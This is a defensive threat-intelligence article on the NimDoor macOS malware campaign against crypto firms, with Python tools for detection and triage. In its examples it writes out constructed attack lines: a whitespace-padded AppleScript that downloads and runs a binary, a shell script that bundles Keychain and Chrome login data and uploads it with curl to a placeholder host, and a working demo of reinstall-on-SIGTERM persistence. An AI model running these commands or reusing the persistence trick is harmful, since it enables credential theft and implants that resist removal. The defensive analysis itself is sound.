North Korean threat actors have launched a sophisticated macOS malware campaign targeting Web3 and cryptocurrency companies using a rare Nim-based backdoor known as NimDoor. This evolving cyber offensive, discovered in April 2025 and analyzed by SentinelLABS on 2 July 2025, leverages novel persistence techniques, encrypted communications via WebSockets (wss), and process injection tactics rarely seen in macOS-focused threats.
The campaign begins with social engineering: victims receive Telegram messages from impersonated contacts, who lure them into a fake Zoom meeting via a Calendly link. The victim is then asked to run a fraudulent "Zoom SDK update script", which is actually an AppleScript named zoom_sdk_support.scpt hosted on spoofed Zoom-like domains (e.g., support.us05web-zoom[.]forum). The script is padded with 10,000 lines of whitespace so that the malicious command sits far below anything a casual inspection of the file would show.
Once executed, it downloads a second-stage payload, initiating a multi-stage infection chain:
- First stage: a C++ binary named simply a writes an encrypted payload, netchk, to disk.
- Second stage: a Nim-based binary named installer drops further binaries, including GoogIe LLC and CoreKitAgent.
Persistence, Evasion, and Exfiltration on macOS
Unprecedented Use of Signal Handlers
CoreKitAgent, compiled from Nim, introduces a novel persistence technique. It installs handlers for the Unix signals SIGINT and SIGTERM, so that when the process is terminated, whether by a user killing it or by launchd sending SIGTERM at shutdown or reboot, the handler re-drops its persistence components (the LaunchAgent and the binaries it relies on) before the process exits. The malware is thus reinstalled at the very moment a responder tries to remove it.
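To make the signal-handler trick concrete, here is a small Python model of it, written for this article and not taken from the NimDoor samples (the plist label com.example.agent, the program path and the temp directory are placeholders). It registers SIGINT/SIGTERM handlers that re-drop a LaunchAgent plist, deletes the plist as a responder would, signals its own process, and reports whether the artifact came back; it also shows that SIGKILL cannot be hooked.

```python
import os
import signal
import tempfile
import time

# Constructed stand-in for a LaunchAgent plist. The label and program path
# are placeholders for this example, not artifacts of the NimDoor campaign.
PLIST_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array><string>{program}</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""


def install_persistence(plist_path: str, program: str) -> None:
    """Drop (or re-drop) the persistence artifact to disk."""
    with open(plist_path, "w", encoding="utf-8") as fh:
        fh.write(PLIST_TEMPLATE.format(program=program))


def arm_signal_reinstall(plist_path: str, program: str) -> dict:
    """Route SIGINT and SIGTERM to a handler that re-drops the artifact.

    Returns a counter dict the handler updates, so a caller can observe
    how often the reinstall fired.
    """
    state = {"reinstalls": 0}

    def handler(signum, frame):
        # Delivered when someone runs `kill <pid>` (SIGTERM), presses Ctrl-C
        # (SIGINT), or launchd sends SIGTERM at shutdown/reboot.
        install_persistence(plist_path, program)
        state["reinstalls"] += 1
        # The real agent would re-drop its binaries here as well and then
        # exit; this demo keeps running so the outcome can be inspected.

    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGTERM, handler)
    return state


def simulate_cleanup_then_kill(plist_path: str, program: str, sig: int) -> dict:
    """Model a responder who deletes the plist and then signals the process.

    Only SIGINT/SIGTERM should be passed here; SIGKILL cannot be handled and
    would terminate the interpreter.
    """
    previous = {s: signal.getsignal(s) for s in (signal.SIGINT, signal.SIGTERM)}
    state = arm_signal_reinstall(plist_path, program)
    try:
        install_persistence(plist_path, program)
        os.remove(plist_path)        # responder removes the artifact ...
        os.kill(os.getpid(), sig)    # ... then sends the "polite" signal
        time.sleep(0.01)             # let the Python-level handler run
        return {
            "artifact_reappeared": os.path.exists(plist_path),
            "reinstalls": state["reinstalls"],
        }
    finally:
        for s, h in previous.items():
            signal.signal(s, h)


def sigkill_is_uncatchable() -> bool:
    """SIGKILL cannot be intercepted: installing a handler for it fails."""
    try:
        signal.signal(signal.SIGKILL, lambda signum, frame: None)
    except (OSError, ValueError):
        return True
    return False


def run_demo() -> dict:
    """Run the scenario in a temp directory and return the observations."""
    with tempfile.TemporaryDirectory() as tmp:
        plist = os.path.join(tmp, "com.example.agent.plist")
        result = simulate_cleanup_then_kill(plist, "/private/tmp/agent", signal.SIGTERM)
    result["sigkill_uncatchable"] = sigkill_is_uncatchable()
    return result


if __name__ == "__main__":
    print(run_demo())
```

The practical consequence for responders: unload and delete the LaunchAgent and the dropped binaries first, then terminate the process with SIGKILL (kill -9), which cannot be intercepted, rather than a plain kill or a reboot, both of which deliver exactly the SIGTERM the handler is waiting for. SIGKILL alone is not enough either: if the plist is still in place, launchd will simply relaunch the agent.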
This malware ecosystem features state machines for execution flow, asynchronous task management, and anti-VM tactics including a 10-minute event-driven delay to evade sandbox detection.
Process Injection and WSS-based C2
The C++ binary a injects the malicious trojan1_arm64 into a benign binary named Target. Code injection of this kind is rare on macOS: obtaining another process's task port requires the injector to hold an entitlement such as com.apple.security.cs.debugger, and the target process must be one the system permits to be attached to (not protected by the hardened runtime, or carrying com.apple.security.get-task-allow). Communication with the command-and-control (C2) server occurs over wss://firstfromsep[.]online/client, using triple-layered RC4 encryption and custom JSON payloads.
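The entitlement check a practitioner would want here is easy to script. The following Python is an added example, not code from the report or from the malware: it parses the XML plist that codesign -d --entitlements :- <binary> prints (recent macOS versions also accept --xml) and flags the entitlements that enable or ease injection. The three dumps are constructed for the example and the binary paths in the scan are placeholders.

```python
import plistlib

# Entitlements relevant to process injection on macOS: the first lets a process
# obtain other processes' task ports, the second marks a process as a willing
# target, the rest weaken library and code-signing protections an injector
# would otherwise have to defeat.
RISKY_ENTITLEMENTS = {
    "com.apple.security.cs.debugger":
        "may obtain task ports of other processes via task_for_pid() (injector)",
    "com.apple.security.get-task-allow":
        "other processes may obtain this process's task port (injection target)",
    "com.apple.security.cs.disable-library-validation":
        "may load libraries not signed by the same team",
    "com.apple.security.cs.allow-unsigned-executable-memory":
        "may create writable and executable memory",
}


def audit_entitlements(plist_xml: bytes) -> list[tuple[str, str]]:
    """Return (entitlement, why-it-matters) for every risky key set to true.

    Input is the XML plist printed by `codesign -d --entitlements :- <binary>`.
    """
    entitlements = plistlib.loads(plist_xml)
    return [(key, why) for key, why in RISKY_ENTITLEMENTS.items()
            if entitlements.get(key) is True]


def scan_dumps(dumps: dict[str, bytes]) -> dict[str, list[tuple[str, str]]]:
    """Audit several dumps keyed by binary path; only binaries with findings are returned."""
    report = {}
    for path, xml in dumps.items():
        findings = audit_entitlements(xml)
        if findings:
            report[path] = findings
    return report


def _plist(body: str) -> bytes:
    """Wrap dict entries in the plist envelope codesign prints."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
            '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
            '<plist version="1.0"><dict>' + body + '</dict></plist>\n').encode()


# Constructed dumps for this example (not recovered from the real samples):
# an injector that carries the debugger entitlement, a target that allows
# attachment, and an ordinary sandboxed app.
INJECTOR_SAMPLE = _plist("""
  <key>com.apple.security.cs.debugger</key><true/>
  <key>com.apple.security.cs.disable-library-validation</key><true/>
""")
TARGET_SAMPLE = _plist("""
  <key>com.apple.security.get-task-allow</key><true/>
""")
SANDBOXED_APP_SAMPLE = _plist("""
  <key>com.apple.security.app-sandbox</key><true/>
  <key>com.apple.security.cs.debugger</key><false/>
""")


if __name__ == "__main__":
    # Placeholder paths, chosen to mirror the names used in the campaign.
    report = scan_dumps({
        "/private/tmp/a": INJECTOR_SAMPLE,
        "/private/tmp/Target": TARGET_SAMPLE,
        "/Applications/Calc.app/Contents/MacOS/Calc": SANDBOXED_APP_SAMPLE,
    })
    for path, findings in report.items():
        print(path)
        for key, why in findings:
            print(f"  {key}: {why}")
```

In a hunt, feed the function the dump of every binary found under /private/tmp and ~/Library: an unsigned or ad-hoc signed executable in a temp directory that carries com.apple.security.cs.debugger has no legitimate reason to exist.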
Data Theft from Browsers, Telegram, and Keychain
Scripts Upl and Tlgrm
Two Bash scripts, upl and tlgrm, are responsible for data exfiltration:
- upl targets browser data from Chrome, Brave, Edge, and Firefox, as well as macOS Keychain files.
- tlgrm steals Telegram databases and encryption keys.
Both scripts exfiltrate the collected data to https://dataupload[.]store/uploadfiles using curl.
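Two observations from this campaign, the delivery script padded with thousands of blank lines and the shell scripts that bundle credential stores and push them out with curl, both reduce to a static triage of script text. The following Python is an added example, not tooling from the report: it measures the blank-line ratio, extracts do shell script payloads from AppleScript, and flags references to Keychain, browser and Telegram data directories alongside curl upload commands. Both input scripts and the upload host (example.invalid) are constructed for the example; the directory fragments are the stock locations of the data those scripts target.

```python
import re
from dataclasses import dataclass, field

# Directories (relative to $HOME) holding the data the upl and tlgrm scripts collect.
SENSITIVE_PATHS = (
    "Library/Keychains",
    "Library/Application Support/Google/Chrome",
    "Library/Application Support/BraveSoftware",
    "Library/Application Support/Microsoft Edge",
    "Library/Application Support/Firefox",
    "Library/Application Support/Telegram Desktop",
)
# curl options that send local data to the server rather than fetch from it.
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data",
                "--data-binary", "--data-raw"}
CURL_RE = re.compile(r"\bcurl\b")
URL_RE = re.compile(r"https?://[^\s\"']+")
DO_SHELL_RE = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')


@dataclass
class Triage:
    total_lines: int
    blank_lines: int
    shell_commands: list = field(default_factory=list)   # AppleScript -> shell hand-offs
    sensitive_paths: list = field(default_factory=list)  # credential/messaging stores referenced
    upload_urls: list = field(default_factory=list)      # destinations of curl uploads

    @property
    def blank_ratio(self) -> float:
        return self.blank_lines / self.total_lines if self.total_lines else 0.0

    def verdict(self, min_lines: int = 1000, padding_ratio: float = 0.9) -> list:
        """Human-readable reasons the script deserves a closer look."""
        reasons = []
        if self.total_lines >= min_lines and self.blank_ratio >= padding_ratio:
            reasons.append(f"whitespace padding: {self.blank_lines} of {self.total_lines} lines are blank")
        if self.shell_commands:
            reasons.append("AppleScript hands off to the shell via 'do shell script'")
        if self.sensitive_paths:
            reasons.append("references credential or messaging stores: " + ", ".join(self.sensitive_paths))
        if self.upload_urls:
            reasons.append("uploads local data with curl to: " + ", ".join(self.upload_urls))
        return reasons


def triage_script(text: str) -> Triage:
    """Static triage of an AppleScript or shell script body."""
    lines = text.split("\n")
    result = Triage(total_lines=len(lines),
                    blank_lines=sum(1 for ln in lines if not ln.strip()))
    result.shell_commands = DO_SHELL_RE.findall(text)
    result.sensitive_paths = [p for p in SENSITIVE_PATHS if p in text]
    for line in lines:
        # A curl invocation counts as an upload only when it carries a flag
        # that sends local data; plain downloads (-o, -O) are not flagged here.
        if CURL_RE.search(line) and UPLOAD_FLAGS.intersection(line.split()):
            result.upload_urls.extend(URL_RE.findall(line))
    return result


# Constructed samples for the example (not the real zoom_sdk_support.scpt or upl):
# an AppleScript with 10,000 blank lines before a single download-and-run
# command, and a shell script that archives credential stores and uploads them.
PADDED_APPLESCRIPT = "\n" * 10000 + (
    'do shell script "curl -fsSL https://example.invalid/sdk -o /private/tmp/a '
    '&& chmod +x /private/tmp/a && /private/tmp/a"\n'
)
EXFIL_SHELL = """#!/bin/bash
H="$HOME"
tar -czf /tmp/k.tgz "$H/Library/Keychains" "$H/Library/Application Support/Google/Chrome/Default/Login Data"
curl -s -F "file=@/tmp/k.tgz" https://example.invalid/uploadfiles
"""


if __name__ == "__main__":
    for name, body in (("padded AppleScript", PADDED_APPLESCRIPT), ("exfil shell script", EXFIL_SHELL)):
        t = triage_script(body)
        print(f"{name}: {t.blank_lines}/{t.total_lines} blank")
        for reason in t.verdict():
            print("  -", reason)
```

The padding check is the one that catches the delivery stage: a legitimate script of a few hundred lines never has a blank-line ratio above 0.9, so the threshold can be kept tight without false positives, while the path and upload checks are what distinguish a collection script from an ordinary installer.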
MEA Impact and Global Implications
Strategic Risks for Web3 and Crypto Firms
Web3 startups in the Middle East and Africa must reevaluate their security postures. The attack highlights how macOS endpoints, often overlooked in corporate networks, are being increasingly exploited.
According to Yusuf Al-Khatib, a regional cybersecurity advisor in Dubai:
“The NimDoor campaign underlines how crypto innovation in MENA is being shadowed by adversarial surveillance. Endpoint hardening must extend beyond Windows.”
With crypto platforms forming part of national economic strategies across Africa and the GCC, attacks like NimDoor may trigger renewed regulatory interest, especially under UAE’s NESA and Saudi Arabia’s ECC regulations.
Global Trend: Malware Authors Flock to Nim
Cross-Platform Languages Are the New Frontier
North Korean groups previously adopted Go and Rust. Now, Nim emerges as a preferred weapon, offering stealth and compile-time function execution. SentinelLABS concludes that Nim’s obscure tooling and unfamiliar structure give attackers a significant edge.
Threat researcher Raffaele Sabato notes:
“NimDoor showcases DPRK’s increasing sophistication on macOS. We’re seeing tactical evolution that outpaces mainstream detection.”
MITRE ATT&CK Mapping & TTPs
- T1566.003 – Phishing: Spearphishing via Service (Telegram)
- T1059.002 – Command and Scripting Interpreter: AppleScript
- T1059.004 – Command and Scripting Interpreter: Unix Shell (Bash)
- T1055 – Process Injection
- T1071.001 – Application Layer Protocol: Web Protocols (WebSockets over TLS)
- T1555.001 – Credentials from Password Stores: Keychain
- T1543.001 – Create or Modify System Process: Launch Agent
- T1005 – Data from Local System
- T1027 – Obfuscated Files or Information
Actionable Takeaways for Defenders
- Restrict AppleScript execution on macOS endpoints using MDM policies.
- Monitor ~/Library/LaunchAgents and /private/tmp for suspicious binary drops.
- Detect padding-heavy scripts like zoom_sdk_support.scpt, whether they arrive as attachments or via download links in chat messages.
- Inspect firewall and proxy logs for outbound wss:// connections from macOS endpoints to unfamiliar hosts.
- Block domains like dataupload[.]store and writeup[.]live at the DNS/firewall level.
- Employ behavioral analysis to catch injection attempts like InjectWithDyldArm64.
- Train SOC teams on Nim-based malware artifacts.
- Incorporate pentesting exercises simulating macOS attacks.
- Use YARA rules to hunt for indicators related to CoreKitAgent and GoogIe LLC.
- Ensure proper security awareness for employees receiving unusual meeting invites or script updates.
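Monitoring ~/Library/LaunchAgents is only useful with a rule that says what suspicious looks like. The following Python is an added example, not from the report: it audits LaunchAgent plists for program paths under temp or hidden directories, for the RunAtLoad plus KeepAlive combination, and for labels or binary names that imitate a trusted vendor with look-alike characters (the capital I standing in for l in GoogIe LLC is the case in point). The two plists, the vendor list and the confusable-character table are constructed for this example.

```python
import os
import plistlib

# Where a legitimate agent's executable would rarely live.
SUSPICIOUS_DIRS = ("/private/tmp/", "/tmp/", "/var/tmp/", "/private/var/tmp/")
# Vendor names worth protecting against look-alike spellings (extend per environment).
TRUSTED_VENDORS = ("google", "apple", "microsoft", "zoom")
# Characters commonly swapped for one another in look-alike names (assumed table).
CONFUSABLES = str.maketrans({"I": "l", "|": "l", "1": "l", "0": "o"})


def looks_like_homoglyph(name: str) -> bool:
    """True if a vendor name appears only after undoing look-alike substitutions."""
    raw = name.lower()
    canonical = name.translate(CONFUSABLES).lower()
    return any(v in canonical and v not in raw for v in TRUSTED_VENDORS)


def audit_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return human-readable findings for one LaunchAgent/LaunchDaemon plist."""
    job = plistlib.loads(plist_bytes)
    label = str(job.get("Label", ""))
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    program = str(args[0]) if args else ""
    findings = []
    for what, value in (("label", label), ("program", os.path.basename(program))):
        if looks_like_homoglyph(value):
            findings.append(f"{what} {value!r} imitates a trusted vendor with look-alike characters")
    if program.startswith(SUSPICIOUS_DIRS) or "/." in program:
        findings.append(f"program {program!r} runs from a temporary or hidden directory")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad with KeepAlive: launchd relaunches the job as soon as it exits")
    return findings


def scan_launch_agents(directory: str) -> dict[str, list[str]]:
    """Audit every .plist in a directory; only flagged files are returned."""
    report = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(directory, name)
        with open(path, "rb") as fh:
            findings = audit_launch_agent(fh.read())
        if findings:
            report[path] = findings
    return report


def _plist(body: str) -> bytes:
    return f'<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>{body}</dict></plist>'.encode()


# Constructed plists for the example (not recovered from the campaign).
SUSPICIOUS_SAMPLE = _plist("""
  <key>Label</key><string>GoogIe LLC</string>
  <key>ProgramArguments</key><array><string>/private/tmp/.cache/agent</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
""")
BENIGN_SAMPLE = _plist("""
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array><string>/Applications/Google Chrome.app/Contents/MacOS/Google Chrome</string></array>
  <key>RunAtLoad</key><true/>
""")


if __name__ == "__main__":
    for sample in (SUSPICIOUS_SAMPLE, BENIGN_SAMPLE):
        print(audit_launch_agent(sample))
    agents_dir = os.path.expanduser("~/Library/LaunchAgents")
    if os.path.isdir(agents_dir):
        print(scan_launch_agents(agents_dir))
```

Run it against /Library/LaunchAgents and /Library/LaunchDaemons as well as the per-user directory; the homoglyph check is the cheapest of the three and the one a human reviewer is most likely to miss when skimming a directory listing.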
Conclusion
The macOS NimDoor campaign is a stark reminder of DPRK’s agility in exploiting emerging technologies. With macOS systems often under-monitored in enterprise settings, this sophisticated attack reinforces the need for layered defenses, cross-platform detection, and proactive threat hunting. The security community must prepare for more stealthy, Nim-based campaigns as attackers seek new frontiers to evade conventional security tools.
Sources
- SentinelLABS: macOS NimDoor Malware Analysis – 2 July 2025
- Huntabil.IT Incident Report – April 2025
- Huntress macOS Threat Research – June 2025
- Validin Threat Feed – Q2 2025
- Nim Programming Documentation
- MITRE ATT&CK Framework